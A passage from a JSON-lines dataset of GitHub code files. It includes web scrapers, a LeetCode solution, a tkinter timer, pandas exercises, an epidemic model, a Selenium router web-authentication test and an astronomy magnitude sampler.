Print the text content of each span element soup.find_all(\"div\", class_=\"used-product-info\"):\n # spanvalue=span.text\n # print(spanchar)\n\n\n for strong in strong_elements:\n print(strong.text) # Print the text content of each span element soup.find_all(\"div\", class_=\"used-product-info\"):\n # strongvalue=strong.text\n # print(strongchar)\n\n \n \n # print(strong_elements.text)\n \n # span_elements = product.find_all(\"span\")\n # if product.find(\"span\"): \n # spanvalue = [span.text.strip() for span in span_elements]\n\n # else:\n # \"N/A\"\n \n # for span in span_elements:\n # span_text = span.text.strip()\n # # print('span:\\n',span_text)\n # spanvalue = str(span_text)\n # print('span:\\n',spanvalue)\n\n except Exception as e:\n continue\n # 콘솔에 출력\n\n print(\"-\" * 40)\n i =i+1\n print(f'{i}=>\\n')\n print(\"상품 이름:\", product_name)\n print(\"정가:\", original_price)\n print(\"판매 가격:\", sale_price)\n # print(\"별점:\", rating)\n print(\"리뷰 개수:\", review_count)\n print(\"카드 할인 정보:\", card_discount)\n print(\"적립 정보:\", reward_info)\n # print(\"배송 정보:\", delivery_info)\n\n # for spanarray in spanvalue:\n # print(spanarray)\n #\n # for strongarray in strongvalue:\n # print(strongarray)\n\n # print(spanvalue)\n # print(strongvalue)\n\n sleep(2)\n\nsleep(100)\n# driver.quit()\n","repo_name":"kim4989d/ezenpythonlevelbegin","sub_path":"webcrawing/coupang_login2.py","file_name":"coupang_login2.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33519461398","text":"class Solution:\n # @param {string} num\n # @return {boolean}\n # 回文数\n def 
isStrobogrammatic(self, num):\n dic = {'9': '6', '6': '9', '1': '1', '8': '8', '0': '0'}\n\n l, r = 0, len(num) - 1\n while l <= r:\n if num[l] not in dic or dic[num[l]] != num[r]:\n return False\n l += 1\n r -= 1\n return True\n\n# 1/5/2018 second time this problem\nclass Solution(object):\n def isStrobogrammatic(self, num):\n \"\"\"\n :type num: str\n :rtype: bool\n \"\"\"\n dict = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'}\n snum = str(num)\n i = 0\n j = len(snum) - 1\n while i <= j:\n if (snum[i] not in dict) or (snum[j] not in dict) or (dict[snum[i]] != snum[j]):\n return False\n i += 1\n j -= 1\n return True\n","repo_name":"JoyiS/Leetcode","sub_path":"crackfun/246.Strobogrammatic Number.py","file_name":"246.Strobogrammatic Number.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26592958944","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# GraphicDetachedTimerManager: handle dynamic and graphical behaviour of a detached timer\n# \n# \n# \nimport tkinter as tk\nfrom TimerData import TimerData\nfrom Util import *\nimport logging\n\n\nclass GraphicDetachedTimer(tk.Toplevel):\n # constructor\n def __init__(self, mgr, name):\n super().__init__()\n self.mgr = mgr\n self.timerConf = mgr.UTtimerConfig\n self.timerData = self.timerConf.getTimerDataFromName(name)\n \n # initialization\n def init(self, ):\n # main logger\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info('')\n self.setTitle( self.timerData.timer_conf[ParamTimerCnf.Name])\n self.createLabelTimer()\n self.bindGTimers()\n # close the window with X\n self.protocol(\"WM_DELETE_WINDOW\", lambda : self.closing_procedure(self.destroy))\n \n # bind all \n def bindGTimers(self):\n self.logger.info('') \n # handle key binding \n self.bind('', lambda event: self.mgr.gTimersManager.processKeyPressed(event))\n \n # (re)create Labels\n def createLabelTimer(self):\n self.logger.info('')\n if self.timerData.label != None:\n self.timerData.label.destroy()\n self.timerData.label = None\n fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n self.logger.debug('Label %s creation text=%s' %(self.timerData.timer_conf[ParamTimerCnf.Name], self.timerData.getStrTimerValue()))\n self.timerData.label = tk.Label(self, text = self.timerData.getStrTimerValue() , \n font = fontTimerLabel,\n foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB], \n bg=self.timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] , padx=int(self.timerConf.general_conf[ParamCnf.TimerFontSize]) / 5)\n self.timerData.label.pack()\n \n #modify Font \n def changeFont(self): \n self.logger.info('')\n if self.timerData.isActive() == True:\n fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n self.timerData.label.config(font = fontTimerLabel)\n \n \n #modify color timer text \n def changeFgColorTimer(self):\n self.logger.info('')\n if self.timerConf.general_conf[ParamCnf.ColorTimerRGB] != '':\n self.timerData.label.config( foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB])\n\n #modify color timer text \n def changeBgColorTimer(self):\n self.logger.info('')\n if 
self.timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] != '':\n self.timerData.label.config(bg=self.timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB])\n \n # modify timer value\n def changeValue(self):\n self.timerData.label.config(text = self.timerData.getStrTimerValue())\n \n # clean\n def clean(self):\n self.logger.info('')\n if self.timerData.timer != None and self.timerData.timer.is_alive():\n self.timerData.timer.cancel()\n self.timerData.label = None\n \n # setTitle\n def setTitle(self, title):\n self.logger.info('title=%s' % title)\n self.title(title)\n \n # ask before closing application\n def closing_procedure(self, callback, *args, **kwargs):\n self.logger.info('args=%s kwargs=%s' % (args, kwargs))\n if self.mgr.optionsEditorMgr != None:\n tk.messagebox.showwarning('Warning', 'options editor opened, close first', parent=self)\n else:\n self.timerData.timer_conf[ParamTimerCnf.ActiveTimer] = False\n if tk.messagebox.askyesno(\"Hiding timer\", \"Do you want the timer to be hidden next time this configuration will be loaded? \", parent = self):\n self.mgr.UTtimerConfig.saveConfiguration()\n self.clean()\n self.mgr.gTimersManager.remove(self)\n callback(*args, **kwargs)\n","repo_name":"Danube31/UTTimer","sub_path":"source/GraphicDetachedTimer.py","file_name":"GraphicDetachedTimer.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70525788282","text":"import json\nimport time\n\n# Import competitions\nfrom eredivisie import EredivisieScraper\nfrom premierleague import PremierLeagueScraper\nfrom laliga import LaLigaScraper\nfrom ligueun import LigueUnScraper\nfrom bundesliga import BundesligaScraper\nfrom seriea import SerieAScraper\nfrom liganos import LigaNOSScraper\n\nverbose = True\ncompetitions = []\ntest = False\ntime_start = time.time()\n\nscrapers = {\n 'eredivisie': EredivisieScraper(verbose=verbose),\n 'premierleague': PremierLeagueScraper(verbose=verbose),\n 'laliga': LaLigaScraper(verbose=verbose),\n 'ligue1': LigueUnScraper(verbose=verbose),\n 'bundesliga': BundesligaScraper(verbose=verbose),\n 'seriea': SerieAScraper(verbose=verbose),\n 'liganos': LigaNOSScraper(verbose=verbose),\n}\n\nfor name, scraper in scrapers.items():\n try:\n competition = scraper.get_competition_json()\n competitions.append(competition)\n with open(name + '.json', 'w+') as fp:\n json.dump(competition, fp)\n\n except Exception as ex:\n print('Couldn\\'t scrape', name, ':', str(ex))\n\ntime_end = time.time()\nprint('Scraping complete in', time_end - time_start, 'seconds')\n\n# Print the result to output/competitions.json\nif not test:\n with open('competitions.json', 'w+') as fp:\n json.dump(competitions, fp)\n","repo_name":"dimas91/soccer-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37954270783","text":"# --------------\n#Importing header files\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Path of the file\r\npath\r\n#Code starts here\r\ndata = pd.read_csv(path)\r\n#print(type(data))\r\n#print(data.columns)\r\ndata.rename(columns={'Total':'Total_Medals'}, inplace=True)\r\ndata.head(10)\n\n\n# --------------\n#Code starts here\r\ndata.head()\r\ndata.columns\r\n\r\ndata['Better_Event'] = np.where(data['Total_Summer']> data['Total_Winter'],'Summer','Winter')\r\ndata['Better_Event'] = 
np.where(data['Total_Summer']==data['Total_Winter'],'Both',\r\ndata['Better_Event'])\r\nprint(data.head())\r\nevent_list = data['Better_Event'].value_counts().index.tolist()\r\nbetter_event = event_list[0]\r\nbetter_event\n\n\n# --------------\n#Code starts here\r\ntop_countries = data[['Country_Name','Total_Summer','Total_Winter','Total_Medals']]\r\n\r\ntop_countries.drop(top_countries.tail(1).index,inplace=True)\r\n\r\ndef top_ten(df,colname):\r\n country_list=[]\r\n top_10 = df.nlargest(10,colname)\r\n country_list = list(top_10['Country_Name'])\r\n return country_list\r\n\r\ntop_10_summer = top_ten(top_countries,'Total_Summer')\r\ntop_10_winter = top_ten(top_countries,'Total_Winter')\r\ntop_10 = top_ten(top_countries,'Total_Medals')\r\n\r\ncommon=[]\r\ncommon_pre=[]\r\ncommon_pre = [i for i in top_10_summer if i in top_10_winter]\r\ncommon = [j for j in common_pre if j in top_10]\r\nprint(common)\r\n\n\n\n# --------------\n#Code starts here\r\nimport matplotlib.pyplot as plt\r\n\r\nsummer_df = data[data['Country_Name'].isin(top_10_summer)]\r\nwinter_df = data[data['Country_Name'].isin(top_10_winter)]\r\ntop_df = data[data['Country_Name'].isin(top_10)]\r\n\r\nsummer_df.plot.bar(x='Country_Name',y='Total_Summer')\r\nwinter_df.plot.bar(x='Country_Name',y='Total_Winter')\r\ntop_df.plot.bar(x='Country_Name',y='Total_Medals')\r\n\n\n\n# --------------\n#Code starts here\r\nsummer_df['Golden_Ratio'] = summer_df['Gold_Summer']/summer_df['Total_Summer']\r\n\r\nsummer_max_ratio = max(summer_df['Golden_Ratio'])\r\nsummer_country_gold = list(summer_df[summer_df['Golden_Ratio']==summer_max_ratio]['Country_Name'])[0]\r\n\r\nwinter_df['Golden_Ratio'] = winter_df['Gold_Winter']/winter_df['Total_Winter']\r\nwinter_max_ratio = max(winter_df['Golden_Ratio'])\r\nwinter_country_gold = list(winter_df[winter_df['Golden_Ratio']==winter_max_ratio]['Country_Name'])[0]\r\n\r\ntop_df['Golden_Ratio'] = top_df['Gold_Total']/top_df['Total_Medals']\r\ntop_max_ratio = max(top_df['Golden_Ratio'])\r\ntop_country_gold = list(top_df[top_df['Golden_Ratio']==top_max_ratio]['Country_Name'])[0]\r\n\r\nprint(summer_country_gold,'s')\r\nprint(winter_country_gold,'w')\r\nprint(top_country_gold,'t')\n\n\n# --------------\n#Code starts here\r\nprint(data.tail(1))\r\ndata_1 = data.drop(data.iloc[-1:].index)\r\nprint(data_1.tail(1))\r\n\r\ndata_1['Total_Points'] = data_1['Gold_Total'].apply(lambda x:x*3) + data_1['Silver_Total'].apply(lambda x:x*2) + data_1['Bronze_Total'].apply(lambda x:x*1)\r\n\r\n#data_1.reset_index(inplace=True)\r\nmost_points = max(data_1['Total_Points'])\r\n\r\nbest_country = list(data_1[data_1['Total_Points']== most_points]['Country_Name'])[0]\r\nprint(most_points)\r\nprint(best_country)\r\n\r\n\r\n\n\n\n# --------------\n#Code starts here\r\nbest = data[data['Country_Name']== best_country][['Gold_Total','Silver_Total','Bronze_Total']]\r\n\r\nbest.plot.bar()\r\nplt.xlabel('United States')\r\nplt.ylabel('Medals Tally')\r\nplt.xticks(rotation=45)\r\nplt.show()\r\n\r\n\n\n\n","repo_name":"nish700/olympic-hero","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17256490736","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 6 23:48:30 2020\n\n@author: ASUS\n\"\"\"\nimport os\nimport sys\ntsvfile=\"/share/yiqian/smorf/code/name2.txt\"\nfile=[]\nwith open(tsvfile) as tsvf:\n for tsv in tsvf:\n tsv=tsv.strip()\n 
file.append(tsv)\n#file=[\"Odonovan_2020_athlete.smorfs.stats\",\"Nagy-Szakal_2017_CFS.smorfs.stats\",\"Lundgren_2018_infants.smorfs.stats\",\"Korpela_2018.smorfs.stats\",\"PRJEB32135_infant_canada.smorfs.stats\",\"Dhakan_2019.smorfs.stats\",\"Sankaranarayanan_2015_nativeAmericans.smorfs.stats\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",]\nfor name in file:\n infile=\"/share/yiqian/smorf/data/\"+name+\".tsv\"\n outfile=\"/share/yiqian/smorf/data/\"+name+\".fasta\"\n outfile=open(outfile,\"w\")\n with open (infile) as f:\n line=f.readline()\n for line in f:\n line=line.strip()\n linelist=line.split(\"\\t\")\n #print(\">\"+linelist[0]+\"\\n\"+linelist[1])\n outfile.write(\">\"+linelist[0]+\"\\n\"+linelist[1]+\"\\n\")\n outfile.close()\n","repo_name":"cocodyq/smORF","sub_path":"code/to_fasta.py","file_name":"to_fasta.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20704960449","text":"from typing import Dict, List\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom itertools import count\nfrom random import randint\nfrom os.path import join, exists\nfrom os import makedirs\n\nfrom data.countries import Countries\n\n\nclass BaseValue:\n def __init__(self, label, value) -> None:\n self.label = label\n self.value = value\n\n\nclass BaseModel:\n # Λ\n per_capita_birth_rate = 0\n # μ\n per_capita_natural_death_rate = 0\n # α\n virus_induced_average_fatality_rate = 0\n # β\n probability_of_disease_transmission = 0\n # ϵ\n rate_of_progression_from_exposed = 0\n # γ\n recovery_rate = 0\n # N0\n init_population = 0\n\n def __init__(self, title=\"Model\", xLabel=\"Days\", yLabel=\"Number of people\", labels=['S', 'E', 'I', 'R'],\n population=1000000, virus_induced_average_fatality_rate=0.006, per_capita_natural_death_rate=0,\n per_capita_birth_rate=0,\n probability_of_disease_transmission=0.75, rate_of_progression_from_exposed=1 / 3,\n recovery_rate=1 / 8, country: Countries = None):\n \"\"\"\n Construct a model\n :param title: Model's title\n :param xLabel: Plot x axis's label\n :param yLabel: Plot y axis's label\n :param labels: List of labels you will have for your plot\n :param population: Init population\n :param virus_induced_average_fatality_rate:\n :param per_capita_natural_death_rate:\n :param per_capita_birth_rate:\n :param probability_of_disease_transmission:\n :param rate_of_progression_from_exposed:\n :param recovery_rate:\n :param country: Which country\n \"\"\"\n self.title = title\n self.xLabel = xLabel\n self.yLabel = yLabel\n self.values_dict: Dict[str, List[BaseValue]] = {}\n self.labels: List[str] = labels\n self.days: List[int] = []\n self.index = count()\n\n self.init_population = population\n self.per_capita_birth_rate = per_capita_birth_rate\n self.per_capita_natural_death_rate = per_capita_natural_death_rate\n self.virus_induced_average_fatality_rate = virus_induced_average_fatality_rate\n self.probability_of_disease_transmission = probability_of_disease_transmission\n self.rate_of_progression_from_exposed = rate_of_progression_from_exposed\n self.recovery_rate = recovery_rate\n self.country = country\n\n def compute(self, days=1):\n \"\"\"\n Compute the result for the future.\n :param days: number of days to advance\n \"\"\"\n raise NotImplementedError\n\n def values(self) -> List[BaseValue]:\n \"\"\"\n Return a list of simulation values.\n :return:\n \"\"\"\n raise NotImplementedError\n\n def __plot__(self):\n \"\"\"\n Plot data\n :return:\n \"\"\"\n for 
label in self.labels:\n vs = self.values_dict[label]\n vs_list = [v.value for v in vs]\n plt.plot(self.days, vs_list, label=label)\n\n plt.xlabel(self.xLabel)\n plt.ylabel(self.yLabel)\n plt.title(self.title)\n plt.legend()\n\n def __simulate_one_day__(self):\n \"\"\"\n Make one day prediction\n :return:\n \"\"\"\n self.compute()\n self.days.append(next(self.index))\n\n def __add_one_day_values__(self):\n \"\"\"\n Input one day's value into the list\n :return:\n \"\"\"\n values = self.values()\n for value in values:\n ls = []\n if value.label in self.values_dict:\n ls = self.values_dict[value.label]\n ls.append(value)\n else:\n ls = [value]\n self.values_dict[value.label] = ls\n\n def __animate__(self, i):\n self.__simulate_one_day__()\n self.__add_one_day_values__()\n plt.cla()\n self.__plot__()\n\n def draw_graph_at(self, days=50, path=\"./results\") -> str:\n \"\"\"\n Draw data.\n :param path: save path\n :param days: Number day step\n :return:\n \"\"\"\n for i in range(days):\n self.__simulate_one_day__()\n self.__add_one_day_values__()\n self.__plot__()\n file_name = f\"{self.title}-{days}.png\"\n folder_name = join(path, 'graphs', str(self.country.value))\n file_name = join(folder_name, file_name)\n output_file_name = join('graphs', str(self.country.value), f\"{self.title}-{days}.png\")\n if not exists(folder_name):\n makedirs(folder_name)\n\n plt.savefig(file_name)\n plt.clf()\n return output_file_name\n\n def animate_graph(self, figure_number=1):\n \"\"\"\n Animate data\n :param figure_number:\n :return:\n \"\"\"\n fig = plt.figure(figure_number)\n ani = FuncAnimation(fig, self.__animate__, interval=1000)\n fig.tight_layout()\n plt.show()\n","repo_name":"sirily11/compartmental_model","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30705522333","text":"#! -*-conding:utf-8 -*-\n#@Time: 2019/1/14 0014 12:44\n#@swzhou\n'''\nweb认证 :弹出认证页面、认证后正常访问网络\n'''\n\n\n\nimport time\nimport unittest\nimport os.path\nimport socket\nimport subprocess\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nfrom common.LogGen import LogGen\nfrom common.CapPic import CapPic\nfrom common.pingTest import pingTestIP\nfrom common.ReadConfig import getAssertText,getParameter,gettelnet\nfrom common.GetExcelValue import getExcelValue\nfrom common.loginRoute import login\nfrom common.organization_edit import organization_group\nfrom pages.Organization_003_userAuthpage import Organization_userAuthPage\nlogger = LogGen(Logger = 'Members_007_WebAuth').getlog()\nbatpath = os.path.dirname(os.path.abspath('.')) + '/script/'\nwebAutnp = getParameter('webAutnp')\nSupport = getExcelValue(webAutnp)\n\nclass webAuth(unittest.TestCase):\n\n def setUp(self):\n logger.info('setUp start')\n # pass\n\n def test_001_openWebAuth(self):\n u'''web认证开启'''\n host = gettelnet('host').split(r'.')\n host1 = host[0] + '.' + host[1] + '.' + host[2] +'.'\n # 006中设置了指定IP,这里增加一个判断联网\n pcaddr = socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n print(pcaddr)\n pingTestIP() # 避免判断失误\n\n p = pingTestIP()\n if p == 'N' or host1 not in pcaddr: # 如果不通 or 地址不为lan口网段\n # 1、改回DHCP, 调用bat脚本\n os.system('%s' % (batpath + 'changeDhcpIp.bat'))\n time.sleep(5)\n n = 0\n while n < 30:\n # 获取本机ip 默认有线地址,有线断开会显示无线\n pcaddr_new = socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n print(pcaddr_new, n)\n if '192.168.' 
not in str(pcaddr_new):\n time.sleep(2)\n n += 1\n else:\n print('IP地址已自动获取成功', n)\n break\n else:\n raise Exception('未获取到地址')\n\n if Support == '√':\n logger.info(u'参数支持本地认证')\n organization_group.import_empty_template(self) # 判断组织架构是否有其他组 有则清空\n\n # 打开用户管理 - 用户认证\n login.loginWeb(self) # admin账号登录\n self.driver.implicitly_wait(10)\n webauth = Organization_userAuthPage(self.driver, self.url)\n # 打开用户管理 - 用户认证\n webauth.click_UserManage()\n time.sleep(0.5)\n webauth.click_userAuth()\n time.sleep(1)\n #开启web认证\n webauth.click_WebAuthEn()\n time.sleep(1)\n # 断言 提示信息是否有误\n status = str(webauth.getAttribute_byXpath(webauth.WebAuthEs,'checked'))\n time.sleep(1)\n self.assertEqual(status,'true',msg='web认证开启出错')\n self.driver.quit()\n elif Support == '×':\n logger.info(u'参数不支持本地认证')\n logger.info('test_001_openWebAuth passed')\n\n def test_002_webAuthTest(self):\n u'''web认证测试'''\n if Support == '√':\n logger.info(u'参数支持本地认证')\n webauthpage = getAssertText('webauthpage')\n webauthsucess = getAssertText('webauthsucess')\n # 新增用户组及认证账号\n # 调用新增组 “SelfComputerTest”\n organization_group.group_add(self)\n time.sleep(1)\n #\n login.loginWeb(self) # admin账号登录\n self.driver.implicitly_wait(10)\n webauth = Organization_userAuthPage(self.driver, self.url)\n # 打开用户管理 - 用户认证\n webauth.click_UserManage()\n time.sleep(0.5)\n webauth.click_userAuth()\n time.sleep(1)\n webauth.click_account()\n time.sleep(1)\n webauth.click_addUser()\n time.sleep(1)\n webauth.input_name('webtest1')\n # 仅有一个用户组,这里省略\n select = webauth.selelement_byName(webauth.authType)\n Select(select).select_by_value('Web')\n time.sleep(1)\n webauth.input_authAccount('webtest1')\n webauth.input_authPassword('webtest1')\n webauth.click_save()\n time.sleep(2)\n # 断言 添加的账号 认证方式和认证账号 是否正常\n list_authtype = webauth.getText_byXpath(webauth.list_authtype)\n list_authAcc = webauth.getText_byXpath(webauth.list_authAcc)\n self.assertEqual(str(list_authtype), 'Web', msg='认证方式显示不为“Web”')\n self.assertEqual(str(list_authAcc), 'webtest1', msg='认证账号不为“webtest1”')\n self.driver.quit()\n\n self.driver = webdriver.Chrome()\n # self.driver.maximize_window()\n self.driver.implicitly_wait(10)\n #打开网页测试\n self.driver.get('http://www.utt.com.cn')\n time.sleep(2)\n title1=self.driver.title\n print(title1)\n self.assertEqual(title1, webauthpage, msg='认证页面跳转不正常')\n\n webauth = Organization_userAuthPage(self.driver, self.url)\n webauth.input_userName('webtest1')\n webauth.input_userPasswd('webtest1')\n webauth.click_loginbtn()\n time.sleep(2)\n title2 = self.driver.title\n print(title2)\n self.assertEqual(title2, webauthsucess, msg='不能认证成功')\n\n self.driver.get('http://www.baidu.com')\n time.sleep(2)\n title3 = self.driver.title\n print(title3)\n self.assertEqual(title3, '百度一下,你就知道', msg='认证后 不能打开网页')\n self.driver.quit()\n elif Support == '×':\n logger.info(u'参数不支持本地认证')\n logger.info('test_002_webAuthTest passed')\n\n def test_003_closeWebAuth(self):\n u'''关闭web认证'''\n if Support == '√':\n logger.info(u'参数支持本地认证')\n # 打开用户管理 - 用户认证\n login.loginWeb(self) # admin账号登录\n self.driver.implicitly_wait(10)\n webauth = Organization_userAuthPage(self.driver, self.url)\n # 打开用户管理 - 用户认证\n webauth.click_UserManage()\n time.sleep(0.5)\n webauth.click_userAuth()\n time.sleep(1)\n # 开启web认证\n webauth.click_WebAuthC()\n time.sleep(1)\n # 断言 提示信息是否有误\n status = str(webauth.getAttribute_byXpath(webauth.WebAuthCs,'checked'))\n time.sleep(1)\n self.assertEqual(status, 'true', msg='web认证关闭出错')\n self.driver.quit()\n print('web认证关闭 验证成功')\n\n # 清空组织架构组\n 
organization_group.import_empty_template(self) # 判断组织架构是否有其他组 有则清空\n print('删除组织架构组 完成')\n elif Support == '×':\n logger.info(u'参数不支持本地认证')\n logger.info('test_003_closeWebAuth passed')\n\n def tearDown(self):\n logger.info('tearDown over')\n logger.info('%s' % ('=' * 50))\n\nif __name__=='__main__':\n unittest.main()\n\n","repo_name":"sanwzhou/SEWEB","sub_path":"SEWEB/3.1.1Router/test_case/Members_007_WebAuth.py","file_name":"Members_007_WebAuth.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14562609129","text":"import os\nimport sys\n\n# -*- coding: utf-8 -*-\n\n'''\n处理上传到kindle的txt文件,防止encoding的问题\n'''\n\norg_file = r'E:\\temp\\js\\晋书\\晋书.txt'\n\n\ndef do_format(filename):\n if not os.path.exists(filename):\n print('File %s not existed.' % filename)\n sys.exit(1)\n\n # abs_filename = os.path.abspath(filename)\n # dir_name = os.path.split(abs_filename)[0]\n prefix = os.path.splitext(filename)[0]\n ext = os.path.splitext(filename)[1]\n print(filename)\n\n l_lines = ''\n try:\n with open(filename, 'r') as f:\n # with open(filename, 'r', encoding='utf-8', errors='ignore') as f:\n # with open(filename, 'r', errors='ignore') as f:\n # l_lines = f.readlines()\n l_lines = f.readlines()\n except Exception as e:\n print(e)\n\n print(l_lines)\n # for l in l_lines:\n # print(l)\n\n out_file = '%s%d%s' % (prefix, 0, ext)\n\n with open(out_file, 'w+') as f:\n for l in l_lines:\n try:\n f.write(l)\n except Exception as e:\n print(e)\n\n print('[Save]', out_file)\n\n\ndef main():\n do_format(org_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"socrates77-sh/play","sub_path":"kindle_txt.py","file_name":"kindle_txt.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37688122181","text":"\"\"\"\ndesitarget.mock.sample\n======================\n\nSamples magnitudes and shapes for LRG, ELG, QSO, and BGS targets from a Gaussian mixture model.\n\nThe model for each object type is fit to DR2 targets that have passed target\nselection critera.\n\"\"\"\n\nfrom __future__ import print_function, division\n\nfrom desiutil.log import get_logger\nlog = get_logger()\n\nclass SampleGMM(object):\n \"\"\"Sample magnitudes based on target type (i.e. LRG, ELG, QSO, BGS).\n\n Can sample multiple targets at once and needs only to be called\n once for each target_type.\n\n Args:\n target_type (str) : One of four object types (LRG, ELG, QSO, BGS).\n n_targets (int) : Number of sampled magntiudes to be returned for the\n specified target_type.\n random_state: RandomState or an int seed. 
A random number generator.\n\n    Returns: np.ndarray length n_targets :\n        Structured array with columns g, r, z, w1, w2, w3, w4, exp_r, exp_e1,\n        exp_e2, dev_r, dev_e1, dev_e2 of sampled magnitudes.\n\n    \"\"\"\n    def __init__(self, random_state=None):\n        from pkg_resources import resource_filename\n        from desiutil.sklearn import GaussianMixtureModel\n\n        bgsfile = resource_filename('desitarget', 'mock/data/bgs_gmm.fits')\n        elgfile = resource_filename('desitarget', 'mock/data/elg_gmm.fits')\n        lrgfile = resource_filename('desitarget', 'mock/data/lrg_gmm.fits')\n        qsofile = resource_filename('desitarget', 'mock/data/qso_gmm.fits')\n\n        self.bgsmodel = GaussianMixtureModel.load(bgsfile)\n        self.elgmodel = GaussianMixtureModel.load(elgfile)\n        self.lrgmodel = GaussianMixtureModel.load(lrgfile)\n        self.qsomodel = GaussianMixtureModel.load(qsofile)\n\n        self.random_state = random_state\n\n    def sample(self, target_type='LRG', n_targets=1):\n        import numpy as np\n\n        if target_type not in ('BGS', 'ELG', 'LRG', 'QSO'):\n            log.fatal('Unknown object type {}!'.format(target_type))\n            raise ValueError\n\n        # Generate a sample of magnitudes/shapes of size n_targets.\n        if target_type == 'BGS':\n            params = self.bgsmodel.sample(n_targets, self.random_state).astype('f4')\n        elif target_type == 'ELG':\n            params = self.elgmodel.sample(n_targets, self.random_state).astype('f4')\n        elif target_type == 'LRG':\n            params = self.lrgmodel.sample(n_targets, self.random_state).astype('f4')\n        elif target_type == 'QSO':\n            params = self.qsomodel.sample(n_targets, self.random_state).astype('f4')\n\n        tags = ('g', 'r', 'z', 'w1', 'w2', 'w3', 'w4')\n        if target_type != 'QSO':\n            tags = tags + ('exp_r', 'exp_e1', 'exp_e2', 'dev_r', 'dev_e1', 'dev_e2')\n\n        samp = np.empty( n_targets, dtype=np.dtype( [(tt, 'f4') for tt in tags] ) )\n        for ii, tt in enumerate(tags):\n            samp[tt] = params[:, ii]\n\n        return samp\n\ndef sample_mag_shape(target_type, n_targets, random_state=None):\n    \"\"\"Sample magnitudes and shapes based on target type (i.e. LRG, ELG, QSO, BGS).\n\n    Can sample multiple targets at once and needs only to be called\n    once for each target_type.\n\n    Parameters\n    ----------\n    target_type : str\n        One of four object types (LRG, ELG, QSO, BGS).\n    n_targets : int\n        Number of sampled magnitudes and shapes to be returned for the specified\n        target_type.\n    random_state: RandomState or an int seed\n        A random number generator.\n\n\n    Returns\n    -------\n    np.ndarray length n_targets\n        Structured array with columns g,r,z,w1,w2,w3,w4,exp_r,exp_e1, exp_e2,\n        dev_r, dev_e1, dev_e2 of sampled magnitudes and shapes.
Note that\n target_type='QSO' only returns magnitudes.\n \"\"\"\n import numpy as np\n from pkg_resources import resource_filename\n from desiutil.sklearn import GaussianMixtureModel\n\n #Path to model .fits files\n pathToModels = resource_filename('desitarget', \"mock/data\")\n\n #Load the mixture model for the specified target_type\n if target_type == 'LRG':\n model = GaussianMixtureModel.load(pathToModels + '/lrg_gmm.fits')\n elif target_type == 'ELG':\n model = GaussianMixtureModel.load(pathToModels + '/elg_gmm.fits')\n elif target_type == 'QSO':\n model = GaussianMixtureModel.load(pathToModels + '/qso_gmm.fits')\n elif target_type == 'BGS':\n model = GaussianMixtureModel.load(pathToModels + '/bgs_gmm.fits')\n\n #Generate a sample of magnitudes of size n_targets\n params = model.sample(n_samples=n_targets, random_state=random_state)\n\n if target_type == 'QSO':\n\n samp = np.empty(n_targets, dtype=[('g', 'f4'), ('r', 'f4'), ('z', 'f4'),\n ('w1', 'f4'), ('w2', 'f4'), ('w3', 'f4'),\n ('w4', 'f4')])\n\n samp['g'] = params[:,0]\n samp['r'] = params[:,1]\n samp['z'] = params[:,2]\n samp['w1'] = params[:,3]\n samp['w2'] = params[:,4]\n samp['w3'] = params[:,5]\n samp['w4'] = params[:,6]\n\n else:\n\n samp = np.empty(n_targets, dtype=[('g', 'f4'), ('r', 'f4'), ('z', 'f4'), ('w1', 'f4'),\n ('w2', 'f4'), ('w3', 'f4'), ('w4', 'f4'),\n ('exp_r', 'f4'), ('exp_e1', 'f4'), ('exp_e2', 'f4'),\n ('dev_r', 'f4'), ('dev_e1', 'f4'), ('dev_e2', 'f4')])\n\n samp['g'] = params[:,0]\n samp['r'] = params[:,1]\n samp['z'] = params[:,2]\n samp['w1'] = params[:,3]\n 